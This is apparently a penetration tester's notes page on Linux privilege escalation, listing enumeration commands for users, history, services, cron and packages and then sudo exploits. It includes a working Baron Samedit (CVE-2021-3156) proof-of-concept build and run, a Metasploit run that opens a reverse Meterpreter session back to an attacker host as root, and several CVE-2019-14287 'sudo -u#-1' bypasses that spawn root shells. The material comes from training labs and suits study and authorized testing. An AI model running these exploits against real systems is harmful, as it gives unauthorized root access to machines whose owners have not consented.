Services & Internals Enum

Network Interfaces

ip a

Hosts

cat /etc/hosts

User's Last Login

lastlog

Username         Port     From             Latest
root                                       **Never logged in**
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
...SNIP...
systemd-coredump                           **Never logged in**
mrb3n            pts/1    10.10.14.15      Tue Aug  2 19:33:16 +0000 2022
lxd                                        **Never logged in**
bjones                                     **Never logged in**
administrator.ilfreight                           **Never logged in**
backupsvc                                  **Never logged in**
cliff.moore      pts/0    127.0.0.1        Tue Aug  2 19:32:29 +0000 2022
logger                                     **Never logged in**
shared                                     **Never logged in**
stacey.jenkins   pts/0    10.10.14.15      Tue Aug  2 18:29:15 +0000 2022
htb-student      pts/0    10.10.14.15      Wed Aug  3 13:37:22 +0000 2022

Logged In Users

w

 12:27:21 up 1 day, 16:55,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
cliff.mo pts/0    10.10.14.16      Tue19   40:54m  0.02s  0.02s -bash

Command History 

history

    1  id
    2  cd /home/cliff.moore
    3  exit
    4  touch backup.sh
    5  tail /var/log/apache2/error.log
    6  ssh ec2-user@dmz02.inlanefreight.local
    7  history

Finding History Files

find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null

Services listening

netstat -tulpn

Cron

ls -la /etc/cron.daily/

Proc

find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"

Installed Packages

apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list

Sudo version

sudo -V
sudo --version

You can check if the sudo version is vulnerable using this grep.

sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

Sudoedit Privesc - CVE 2023-22809

Affected sudo versions: 1.8.0 to 1.9.12p1.

exploit/linux/local/sudoedit_bypass_priv_esc

Baron Samedit - CVE-2021-3156

Versions 1.8.2-1.8.31p2 to 1.9.0-1.9.5p1

  • 1.8.31 - Ubuntu 20.04

  • 1.8.27 - Debian 10

  • 1.9.2 - Fedora 33

  • and others

Poc

$ git clone https://github.com/blasty/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make

rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
$ cat /etc/lsb-release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"
~$ ./sudo-hax-me-a-sandwich 1

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **

# id

uid=0(root) gid=0(root) groups=0(root)

  • Metasploit exploit:

msf6 exploit(linux/local/sudo_baron_samedit) > set session 3
session => 3
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost tun0
lhost => 10.10.16.110
msf6 exploit(linux/local/sudo_baron_samedit) > set lport 443
lport => 443
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 10.10.16.110:443 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/D9M8vioM30.py' (763 bytes) ...
[*] Writing '/tmp/libnss_CcyrQ/Q .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/D9M8vioM30.py
[+] Deleted /tmp/libnss_CcyrQ/Q .so.2
[+] Deleted /tmp/libnss_CcyrQ
[*] Meterpreter session 4 opened (10.10.16.110:443 -> 10.129.203.52:50308) at 2024-04-08 08:23:25 -0400

meterpreter > ls
Listing: /tmp
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100755/rwxr-xr-x  207   fil   2024-04-08 08:20:01 -0400  cPGjXRBL

meterpreter > getuid
Server username: root
meterpreter >

All versions below 1.8.28 - CVE-2019-14287

Requires only a single prerequisite. It had to allow a user in the /etc/sudoers file to execute a specific command

Example 1

$ sudo -l
[sudo] password for cry0l1t3: **********

User cry0l1t3 may run the following commands on Penny:
    ALL=(ALL) /usr/bin/id
$ sudo -u#-1 id

root@nix02:/home/cry0l1t3# id

uid=0(root) gid=1005(cry0l1t3) groups=1005(cry0l1t3)

Example 2

$ sudo -l 
Matching Defaults entries for htb-student on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on ubuntu:
    (ALL, !root) /bin/ncdu
$ sudo -u#-1 /bin/ncdu

Type the “b” letter on your keybord to open a new shell terminal on the system

$ sudo -u#-1 /bin/ncdu
# id
uid=0(root) gid=1001(htb-student) groups=1001(htb-student)
#

Example 3

sudo -l
Password: 
Matching Defaults entries for user on XXX-NIX04:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User ben may run the following commands on XXX-NIX04:
    (ALL, !root) /bin/bash
$ sudo -u#-1 /bin/bash
root@XXX-NIX04:/home/user#

More exploits

  • Sudo Buffer Overflow (CVE-2019-18634, version < 1.8.26)

  • Sudo Security Bypass (CVE-2019-14287, version < 1.8.28)

Binaries

ls -l /bin /usr/bin/ /usr/sbin/

GTFOBins

for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done

Trace System Calls

strace ping -c1 10.129.112.20

Configuration files

find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null

Scripts

find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"

Running Services by User

ps aux | grep root

PreviousEnvironment EnumNext/etc/passwd

Last updated